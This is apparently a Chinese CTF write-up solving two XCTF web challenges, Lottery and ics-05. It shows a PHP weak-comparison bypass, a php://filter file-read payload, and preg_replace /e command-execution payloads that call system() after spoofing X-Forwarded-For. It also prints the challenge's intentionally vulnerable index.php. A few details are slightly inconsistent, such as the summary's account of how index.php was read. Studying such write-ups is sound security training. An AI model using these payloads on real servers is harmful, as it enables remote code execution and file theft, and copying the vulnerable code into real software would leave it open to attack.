攻防世界 Web 题解：Lottery 与 ics-05 漏洞分析

拦截流量包修改回应包，利用 PHP 的弱类型比较漏洞，将 numbers 字段改为 [true,true,true,true,true,true,true]。

成功利用弱类型得到奖金。

成功拿到 Flag。

二、ics-05

打开页面如下所示。

查看页面源代码发现一个 href 链接。

打开链接显示无特殊内容，但修改参数为 index.php 可回显 OK。若能读取 index.php 则可能获取 Flag。

使用伪协议读取文件：

php://filter/read=convert.base64-encode/resource=index.php

解密 Base64 后观察代码。若 IP 为 127.0.0.1 则为管理员，且存在 preg_replace 方法，当 pattern 第一个参数的结尾包含 /e 修正符时，第二个参数会被当做 PHP 代码执行。

修改 IP 为 admin（实际需通过 X-Forwarded-For 或类似头），添加三个参数：

*?pat=/heihei/e&rep=system('find+-name+ flag ')&sub=heihei

需要使用 + 置换空格，得到 flag.php。

成功拿到 Flag，但注意 Flag 不在页面渲染中显示。

?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei

解密后的 index.php 代码

<?php error_reporting(0); @session_start(); posix_setuid(1000); ?> <!DOCTYPE HTML> <html> <head> <meta charset="utf-8"> <meta name="renderer" content="webkit"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="stylesheet" href="layui/css/layui.css" media="all"> <title>设备维护中心</title> <meta charset="utf-8"> </head> <body> <ul> <li><a href="?page=index">云平台设备维护中心</a></li> </ul> <fieldset> <legend>设备列表</legend> </fieldset> <table></table> <script type="text/html"> <!-- 这里的 checked 的状态只是演示 --> <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开 | 关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}> </script> <script src="layui/layui.js" charset="utf-8"></script> <script> layui.use('table', function() { var table = layui.table, form = layui.form; table.render({ elem: '#test', url: '/somrthing.json', cellMinWidth: 80, cols: [ [ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ] ], page: true }); }); </script> <script> layui.use('element', function() { var element = layui.element; //导航的 hover 效果、二级菜单等功能，需要依赖 element 模块 //监听导航点击 element.on('nav(demo)', function(elem) { //console.log(elem) layer.msg(elem.text()); }); }); </script> <?php $page = $_GET[page]; if (isset($page)) { if (ctype_alnum($page)) { ?> <br /><br /><br /><br /> <div> <p><?php echo $page; die();?> </p> <br /><br /><br /><br /> <?php }else{ ?> <br /><br /><br /><br /> <div> <p> <?php if (strpos($page, 'input') > 0) { die(); } if (strpos($page, 'ta:text') > 0) { die(); } if (strpos($page, 'text') > 0) { die(); } if ($page === 'index.php') { die('Ok'); } include($page); die(); ?> </p> <br /><br /><br /><br /> <?php }} //方便的实现输入输出的功能，正在开发中的功能，只能内部人员测试 if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') { echo "<br >Welcome My Admin ! <br >"; $pattern = $_GET[pat]; $replacement = $_GET[rep]; $subject = $_GET[sub]; if (isset($pattern) && isset($replacement) && isset($subject)) { preg_replace($pattern, $replacement, $subject); }else{ die(); } } ?> </body> </html>

三、总结

本文通过攻防世界中的两个 Web 题目（Lottery 和 ics-05）演示了如何利用代码审计和漏洞挖掘技术获取 Flag。在 Lottery 题目中，通过分析网站的猜数字游戏功能，发现使用 PHP 的弱类型比较漏洞，成功绕过验证并获取奖金和 Flag。在 ics-05 题目中，通过修改 IP 地址和利用 PHP 的 preg_replace 函数执行系统命令，成功读取并解密 index.php 文件，最终获取 Flag。